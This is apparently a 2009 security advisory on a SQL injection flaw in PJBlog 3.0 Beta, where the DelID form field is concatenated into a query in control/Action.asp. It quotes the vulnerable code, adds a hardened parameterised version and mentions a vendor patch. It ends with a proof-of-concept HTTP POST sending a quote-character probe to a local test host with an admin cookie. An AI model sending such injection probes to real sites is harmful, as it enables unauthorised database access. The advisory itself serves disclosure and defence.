PJBlog blog system: insufficient filtering of the DelUserID variable in the back-end Action.asp page leads to a SQL injection flaw

2009-05-08T00:00:00
ID SSV:11242
Type seebug
Reporter Root
Modified 2009-05-08T00:00:00

Description

In the file control/Action.asp:

  ElseIf Request.Form("whatdo") = "DelUser" Then  ' line 510
  Dim DelUserID, DelUserName, blogmemberNum, DelUserStatus
  DelUserID = Request.Form("DelID")
  blogmemberNum = conn.Execute("select count(mem_ID) from blog_Member where mem_Status='SupAdmin'")(0)
  DelUserStatus = conn.Execute("select mem_Status from blog_Member where mem_ID="&DelUserID)(0)

The DelUserID variable is concatenated directly into the SQL statement without any filtering, which is what produces the injection vulnerability.
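A hardened version of the DelUser branch, added here as an example and not PJBlog's own code. It reuses the names from the advisory (conn, blog_Member, mem_ID, mem_Status, the DelID form field); the helper names IsPlainInteger and GetMemberStatus, the assumption that mem_ID is an integer column, and the error handling are assumptions. The value is validated as a plain integer first, and the lookup then uses an ADODB.Command parameter instead of string concatenation, so the submitted value can never change the shape of the query.

```vbscript
<%
' Added example (not PJBlog's own code): hardened DelUser branch for control/Action.asp.
Option Explicit

' ADO constants (values from adovbs.inc) so the page works without including it
Const adInteger = 3
Const adParamInput = 1

' True only if s is a plain decimal integer of sane length.
' IsNumeric is deliberately avoided: it also accepts "1e3", "&H1F", " 1" and the like.
Function IsPlainInteger(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    IsPlainInteger = re.Test(s)
End Function

' Look up a member's status with a parameterised query (mem_ID assumed to be an integer column).
Function GetMemberStatus(conn, memberID)
    Dim cmd, rs
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "select mem_Status from blog_Member where mem_ID = ?"
    cmd.Parameters.Append cmd.CreateParameter("mem_ID", adInteger, adParamInput, , memberID)
    Set rs = cmd.Execute
    If rs.EOF Then
        GetMemberStatus = ""
    Else
        GetMemberStatus = rs(0)
    End If
    rs.Close
End Function

If Request.Form("whatdo") = "DelUser" Then
    Dim DelUserID, DelUserStatus
    DelUserID = Trim(Request.Form("DelID"))
    ' Reject the request before the value gets anywhere near SQL.
    ' The advisory's proof of concept value (1') fails this check.
    If Not IsPlainInteger(DelUserID) Then
        Response.Write "Invalid member ID"
        Response.End
    End If
    DelUserStatus = GetMemberStatus(conn, CLng(DelUserID))
    ' ... the SupAdmin count check and the deletion itself continue as in the original
End If
%>
```

The regular-expression check alone already stops the advisory's probe, but the parameter is what removes the bug class: any later change to how DelID is read cannot reintroduce injection as long as the value is bound rather than concatenated. The same pattern applies to every other conn.Execute in the file that builds SQL from request data.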

PJblog 3.0 Beta


The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's site: http://bbs.pjhome.net/thread-48122-1-1.html

POST /ConContent.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
Referer: http://127.0.0.1:103/ConContent.asp?Fmenu=Categories
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; .NET CLR 2.0.50727)
Host: 127.0.0.1:103
Content-Length: 102
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PJBlog3Setting=ViewType=normal; PJBlog3=memRight=111111111111&memName=admin&memHashKey=01c1dc172188d12f917e6c2492e787d43ce0966c; ASPSESSIONIDQAABRAAQ=LAJBLBADFALCDBPMDPHHNCGL; ASP.NET_SessionId=052531uhossk1155ks5dm245; CheckCode=4633B8B4FA46833C; ASPSESSIONIDCABCSCDT=ICDNLLBDEBHJHCMNKBICIECH; ASPSESSIONIDQABBRABQ=IPGLOPCDNGMADODNDNMDLALO

action=Members&whatdo=DelUser&DelID=1%27&Submit=%E4%BF%9D%E5%AD%98%E6%97%A5%E5%BF%97%E5%88%86%E7%B1%BB